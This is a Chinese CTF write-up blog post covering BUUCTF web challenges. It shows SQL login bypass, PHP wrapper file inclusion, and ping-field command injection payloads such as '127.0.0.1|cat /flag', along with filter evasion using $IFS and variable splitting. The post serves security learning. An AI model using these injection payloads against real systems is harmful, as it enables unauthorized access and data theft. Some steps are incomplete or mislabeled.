buuctf——web题目练习

最新推荐文章于 2024-05-16 07:20:57 发布
最新推荐文章于 2024-05-16 07:20:57 发布
阅读量730 收藏 30
点赞数 11
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_82760239/article/details/138244452
版权

1.极客大挑战2019 easysql 

密码或者用户输入万能密码即可

关于万能密码的理解和原理,可以参考这篇BUUCTF[极客大挑战 2019] EasySQL 1_[极客大挑战 2019]easysql 1-CSDN博客

2.极客大挑战2019 have fun

题目源码

需要构造payload

网页传参可参考:

Web 页面之间传递参数的几种方法_web页面之间的传递数据方式-CSDN博客

3.ACTF2020新生赛include1

php伪协议,第一种就是先尝试php://input,发现被过滤了

使用:

    file://[文件的绝对路径和文件名]

    http://127.0.0.1/include.php?file=file://E:\phpStudy\PHPTutorial\WWW\phpinfo.txt

    file://[文件的相对路径和文件名]

    http://127.0.0.1/include.php?file=./phpinfo.txt

    http://网络路径和文件名

    http://127.0.0.1/include.php?file=http://127.0.0.1/phpinfo.txt

尝试php://filter,发现成功了,然后用工具进行base64解码

发现file=flag.php

改一下payload

解码后得到flag

4.[ACTF2020 新生赛]Exec1

输入127.0.0.1后

输入127.0.0.1| ls未发现flag,于是从根目录开始找

输入127.0.0.1| ls/,发现了flag目录

读取flag内容,输入127.0.0.1|cat /flag

找到flag为

flag{2c00cb0e-6281-4979-a47a-41b03905b4ce}

5.[GXYCTF2019]Ping Ping Ping

输入?ip=1270.0.1,有回显

输入127.0.0.1 |ls,出现如下界面

输入127.0.0.1;ls   ,发现了flag.php

下一步抓取flag

可能是其中的空格被过滤了

依旧报错,还是有元素被过滤了

尝试了好几个代替空格的方式,结果都被过滤了

输入127.0.0.1;cat$IFS$index.php,结果如下

过滤了flag

考虑把flag.php换位base64编码后的,flag.php编码后为 ZmxhZy5waHA=

还是不行,发现是方式不对,不能直接将编码后的base64码直接放到后面

过滤了的元素现在就一目了然了

运用一个简单的传参避开flag的隐藏

6.[SUCTF 2019]EasySQL

必备知识

1、命令联合执行

    ; 前面的执行完执行后面的
    | 管道符,上一条命令的输出,作为下一条命令的参数(显示后面的执行结果)
    || 当前面的执行出错时(为假)执行后面的
    & 将任务置于后台执行
    && 前面的语句为假则直接出错,后面的也不执行,前面只能为真
    %0a (换行)
    %0d (回车)

2、命令绕过空格

    当我们执行系统命令时,不免会遇到空格,如cat flag.txt,当空格被程序过滤时,便需要利用以下字符尝试代替绕过:  ${IFS}$              $IFS$                    %09   等等

    即: cat<flag.php
         cat${IFS}flag.php
         cat$IFS$9flag.php

3、变量拼接

比如我们想执行 cat flag.php但对方过滤了flag字符串

如:preg_match("/.*f.*l.*a.*g.*/", $ip)这个的意思是匹配到按flag这个顺序的所有字符

那么我们就可以利用变量拼接绕过:

?a=g;cat fla$a.php即可。
 

2401_82760239
关注
  • 11
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2024年2024网络安全技术自学路线图及职业选择方向_网安学习路线图(4),2024年最新高级网络安全面试答案
2401_84254418的博客
05-05 627
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。伴随国家新基建战略的推行,人工智能、大数据、云计算、物联网、5G 等新兴技术的高速发展,层出不穷的新型黑客攻击手法也随之而来,无数政府单位被定向攻击、企业核心数据被盗、个人敏感信息泄露。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;薪资区间6k-15k。
BUUCTF——Web_buuctfweb,精心整理
2401_84160272的博客
04-09 877
登录后便可查看到flagflag为:启动靶机,出现以下页面查看源代码尝试在网址后面加上?cat=dog出现以下存在flag的页面flag为:启动靶机,出现以下页面查看源代码source.php 应该是后端的源码,这题代码审计了源码中 给出了 两个文件,还有一个 **hint.php,**这里给出了flag的位置得到flagflag为:启动靶机,出现以下界面点击tips跳转到flag.php,flag应该就在这个php文件中文件名为flag.php,那么flag应该就存在于此文件中,但是我们f12并没有查看到
BUUCTF--Web篇详细wp_buuctfweb
最新发布
2401_84247617的博客
05-16 993
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;薪资区间6k-15k。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。
buuctf 部分web
weixin_74427106的博客
03-14 1981
打开网站,停一会会跳转die,了解一下,这就类似一个通关游戏,不能死亡,也就是说进入/die这个网站就意味着题就做不出来了;所以回到上一个网站原网站,查看源码;返回这里去查看源码,得到/chase/然后访问这里最好去抓一个包去查看,要不我怕反应不过来就跳转过去了,找到了/leftt/
BUUCTF web 系列详解 (详细版)持续更新中
llki666的博客
12-27 1848
mb_strpos为查找某值第一次出现的位置,这里表示截取page从0开始到第一个问号之间的字符 串,赋值给_page*/万能密码:1 and 1=1(数字型) 或1' and '1'='1(字符型)或 1 or 1=1(数字型) 或 1 or '1'='1(字符型)/*mb_substr为截断函数,第一个参数为传进来的字符串,第二个为起始位置,第三个参数为长度。mb_substr("abbcv", 0, 2)从第0个位置开始,截取前2个字符串 // 输出:ab。函数截取其中的问号位置之前的子串。
【CTF】buuctf web 详解(持续更新)
热门推荐
m0_52923241的博客
08-12 3万+
buuctf web[HCTF 2018]WarmUp[极客大挑战 2019]EasySQL[极客大挑战 2019]Havefun[强网杯 2019]随便注[ACTF2020 新生赛]Include[SUCTF 2019]EasySQL[极客大挑战 2019]Secret File[ACTF2020 新生赛]Exec[极客大挑战 2019]LoveSQL[GXYCTF2019]Ping Ping Ping[极客大挑战 2019]Knife[极客大挑战 2019]Http[RoarCTF 2019]Easy
BUUCTF--Web篇详细wp
Aluxian_的博客
04-10 4372
BUUCTF--Web篇详细wp。
BUUCTF_Web题目题解记录1
Altering_Ji的博客
07-11 2459
记录一下buu 刷题网站上最近做的三道web题目:[GYCTF2020]Blacklist(堆叠注入)、[网鼎杯 2020 青龙组]AreUSerialz(反序列化)、[GXYCTF2019]BabyUpload(文件上传)
BUUCTF部分web题目
05-06
写题记录
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
题目【BJDCTF2020]Mark loves cat】中,我们看到攻击者通过`.git`泄露获取到了网站的源码。通过运行`GitHack.py`脚本,他们找到了`flag.php`和`index.php`。在`index.php`中,代码检查了`GET`和`POST`中是否都有`...
BUUCTFweb之强网杯2019随便注
12-14
开始注入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: ...
BUUCTF逆向前八题
01-24
在本篇中,我们将探讨在BUUCTF储备赛中遇到的前八道逆向题目,通过这些题目来学习如何使用逆向工具,如exeinfo和IDA,以及如何解析汇编代码以获取关键信息。 1. Easyre: 这道题首先使用exeinfo查看文件信息,确认...
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
04-09
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
BUUCTFWeb题解
xuanyulevel6的博客
08-08 5168
BUUCTFWeb题解
BUUCTF Web】WriteUp超详细
qq_62604985的博客
07-10 1879
buutctf web题目题解, 升大三的暑假自己刷来提高能力的,是自己边做边写,暑假期间只要没事情,每天都会写一些题目,最迟晚上更新
BUUCTF(web刷题记录一)
nareku的博客
04-16 8690
前言 涨知识的一天 打开一看是简单计算器,随便输入看看 发现字母输入不了,查看源码 发现是在calc.php里面计算的,而且提示说存在Waf,这些字母应该就是Waf过滤的,访问calc.php <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' '
BUUCTF——Web
2201_75331136的博客
07-11 946
启动靶机,出现这个用户登录页面 随便输入一个用户名和密码,通过网址可以判断出该请求方式使用万能密码测试是否存在SQL注入漏洞登录后便可查看到flagflag为:启动靶机,出现以下页面 查看源代码尝试在网址后面加上?cat=dog出现以下存在flag的页面flag为:启动靶机,出现以下页面查看源代码source.php 应该是后端的源码,这题代码审计了 源码中 给出了 两个文件,还有一个 hint.php,这里给出了flag的位置 得到flagflag为:启动靶机,出现以下界面点击tips跳转到flag.ph
BUUCTF-练习场-WEB-第一部分(8道)
weixin_45908624的博客
02-15 2000
BUUCTF-WEB 8道题
BUUCTF的wireshark题目
09-19
BUUCTF的wireshark题目涉及使用Wireshark工具来分析网络流量包。首先,你需要从BUUCTF官方网站上下载并安装Wireshark工具。接下来,你可以打开网络流量包并浏览其中的内容。在分析过程中,你可以使用一些技巧,例如搜索特定的HTTP请求方法,如POST方法,以找到包含上传登录信息的数据包。在HTML的FORM URL ENCODED部分,你可以找到管理员使用POST方法上传的密码信息。最后,你可以找到flag,其格式为{ffb7567a1d4f4abdffdb54e022f8facd&captcha}。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值